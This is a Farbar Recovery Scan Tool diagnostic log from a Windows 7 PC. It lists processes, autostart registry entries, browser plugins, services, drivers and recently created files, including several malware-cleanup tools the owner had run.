(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe [854704 2014-09-23] (Adobe Systems Incorporated)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x7EF78E2F6EF8CF01
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-11-03] ()
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 16:07 - 2014-11-07 16:07 - 00328126 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160712.11600.log
2014-11-07 16:06 - 2014-11-07 16:07 - 00328192 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160632.9176.log
2014-11-07 15:57 - 2014-11-07 15:57 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\Ryan\Desktop\tdsskiller.exe
2014-11-07 15:57 - 2014-11-07 15:57 - 00186568 _____ (ESET) C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
2014-11-07 15:53 - 2014-11-07 15:53 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-03 21:28 - 2014-11-03 21:28 - 00002159 _____ () C:\Users\Ryan\AppData\Local\recently-used.xbel
2014-11-03 20:24 - 2014-11-03 20:25 - 00000000 ____D () C:\Users\Ryan\AppData\Local\{9B1BF085-634B-426D-BDB3-489C0053B60E}
2014-11-03 18:29 - 2014-11-03 18:29 - 00000632 _____ () C:\Users\Ryan\Desktop\JRT.txt
2014-11-03 18:26 - 2014-11-03 18:26 - 01706359 _____ (Thisisu) C:\Users\Ryan\Desktop\JRT.exe
2014-11-03 18:25 - 2014-11-03 18:25 - 00000730 _____ () C:\Users\Ryan\Desktop\AdwCleaner[S0].txt
2014-11-03 18:20 - 2014-11-03 18:22 - 00000000 ____D () C:\AdwCleaner
2014-11-03 18:20 - 2014-11-03 18:20 - 01375089 _____ () C:\Users\Ryan\Desktop\AdwCleaner.exe
2014-11-03 18:19 - 2014-11-03 18:19 - 00004981 _____ () C:\Users\Ryan\Desktop\RKreport_SCN_11032014_181839.log
2014-11-03 18:14 - 2014-11-03 18:14 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-03 18:14 - 2014-11-03 18:14 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-03 18:13 - 2014-11-03 18:13 - 14670424 _____ () C:\Users\Ryan\Desktop\RogueKiller.exe
2014-11-03 15:20 - 2014-11-03 15:20 - 00019461 _____ () C:\ComboFix.txt
2014-11-03 15:11 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 15:11 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 15:11 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 15:09 - 2014-11-03 15:20 - 00000000 ____D () C:\Qoobox
2014-11-03 15:09 - 2014-11-03 15:19 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 15:08 - 2014-11-03 15:08 - 05591672 ____R (Swearware) C:\Users\Ryan\Desktop\ComboFix.exe
2014-11-02 22:52 - 2014-11-02 22:52 - 00002392 _____ () C:\Users\Ryan\Desktop\aswMBR.txt
2014-11-02 22:52 - 2014-11-02 22:52 - 00000512 _____ () C:\Users\Ryan\Desktop\MBR.dat
2014-11-02 22:25 - 2014-11-02 22:26 - 05192704 _____ (AVAST Software) C:\Users\Ryan\Desktop\aswMBR.exe
2014-11-02 22:23 - 2014-11-07 17:46 - 00014112 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-11-02 22:23 - 2014-11-02 22:24 - 00026866 _____ () C:\Users\Ryan\Desktop\Addition.txt
2014-11-02 22:18 - 2014-11-07 17:46 - 00000000 ____D () C:\FRST
2014-11-02 22:17 - 2014-11-02 22:18 - 02114560 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-11-01 22:30 - 2014-11-01 22:31 - 00001058 _____ () C:\DelFix.txt
2014-10-30 20:53 - 2014-11-01 22:30 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 00:30 - 2014-10-30 00:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 00:28 - 2014-10-30 00:28 - 00000000 ____D () C:\RegBackup
2014-10-30 00:27 - 2014-10-30 00:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 18:45 - 2014-10-29 18:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 15:38 - 2014-10-15 15:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 19:39 - 2014-10-20 21:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 15:21 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 15:21 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 15:21 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 15:21 - 2014-07-06 20:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 15:21 - 2014-07-06 20:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 15:20 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 15:20 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 15:20 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 15:20 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 15:20 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 15:20 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 15:20 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 15:20 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 15:20 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 15:20 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 15:20 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 15:20 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 15:20 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 15:20 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 15:20 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 15:20 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 15:20 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 15:20 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 15:20 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 15:20 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 15:20 - 2014-08-18 22:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 15:20 - 2014-08-18 22:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 15:20 - 2014-08-18 22:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 15:20 - 2014-08-18 22:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 15:20 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
